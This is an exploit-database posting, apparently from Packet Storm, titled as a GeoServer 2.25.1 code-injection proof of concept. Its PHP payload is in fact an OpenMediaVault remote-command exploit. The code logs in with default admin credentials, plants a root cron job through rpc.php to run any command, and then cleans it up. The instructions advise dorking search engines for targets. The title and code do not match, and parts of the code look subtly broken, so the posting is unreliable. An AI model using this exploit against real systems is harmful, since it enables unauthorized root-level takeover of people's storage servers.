Share
## https://sploitus.com/exploit?id=PACKETSTORM:182018
=============================================================================================================================================  
| # Title : GeoServer 2.25.1 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://github.com/geoserver/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 118 set your target .  
  
[+] Line 123 set your command to execute.  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class OpenMediaVaultExploit  
{  
private $targetUri;  
private $username;  
private $password;  
private $persistent;  
private $cronUuid;  
private $versionNumber;  
  
public function __construct($targetUri, $username, $password, $persistent = false)  
{  
$this->targetUri = $targetUri;  
$this->username = $username;  
$this->password = $password;  
$this->persistent = $persistent;  
}  
  
private function sendRequest($url, $data)  
{  
$ch = curl_init($url);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));  
curl_setopt($ch, CURLOPT_HTTPHEADER, [  
'Content-Type: application/json'  
]);  
$response = curl_exec($ch);  
curl_close($ch);  
  
return json_decode($response, true);  
}  
  
public function login()  
{  
echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";  
  
$data = [  
'service' => 'Session',  
'method' => 'login',  
'params' => [  
'username' => $this->username,  
'password' => $this->password  
],  
'options' => null  
];  
  
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);  
return isset($response['authenticated']) && $response['authenticated'] === true;  
}  
  
public function checkTarget()  
{  
echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";  
  
$data = [  
'service' => 'System',  
'method' => 'getInformation',  
'params' => null  
];  
  
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);  
return $response;  
}  
  
public function checkVersion($response)  
{  
if (!empty($response)) {  
$version = $response['response']['version'] ?? null;  
return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;  
}  
return null;  
}  
  
public function executeCommand($cmd)  
{  
echo "Executing command...\n";  
  
$schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';  
$uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';  
  
$data = [  
'service' => 'Cron',  
'method' => 'set',  
'params' => [  
'uuid' => $uuid,  
'enable' => true,  
'execution' => 'exactly',  
'minute' => $schedule,  
'hour' => $schedule,  
'dayofmonth' => $schedule,  
'month' => $schedule,  
'dayofweek' => $schedule,  
'username' => 'root',  
'command' => $cmd,  
'sendemail' => false,  
'comment' => '',  
'type' => 'userdefined'  
],  
'options' => null  
];  
  
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);  
$this->cronUuid = $response['response']['uuid'] ?? '';  
$this->applyConfigChanges();  
echo "Cron payload execution triggered.\n";  
}  
  
public function applyConfigChanges()  
{  
$data = [  
'service' => 'Config',  
'method' => 'applyChangesBg',  
'params' => [  
'modules' => [],  
'force' => false  
],  
'options' => null  
];  
  
$this->sendRequest($this->targetUri . '/rpc.php', $data);  
}  
  
public function removePayload()  
{  
if (!$this->persistent) {  
$data = [  
'service' => 'Cron',  
'method' => 'delete',  
'params' => [  
'uuid' => $this->cronUuid  
]  
];  
  
$response = $this->sendRequest($this->targetUri . '/rpc.php', $data);  
if ($response) {  
$this->applyConfigChanges();  
echo "Cron payload entry successfully removed.\n";  
} else {  
echo "Cannot access cron services to remove payload.\n";  
}  
}  
}  
}  
  
// Usage  
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);  
if ($exploit->login()) {  
$response = $exploit->checkTarget();  
if ($response) {  
$exploit->versionNumber = $exploit->checkVersion($response);  
$exploit->executeCommand('your-command-here');  
$exploit->removePayload();  
}  
}  
  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================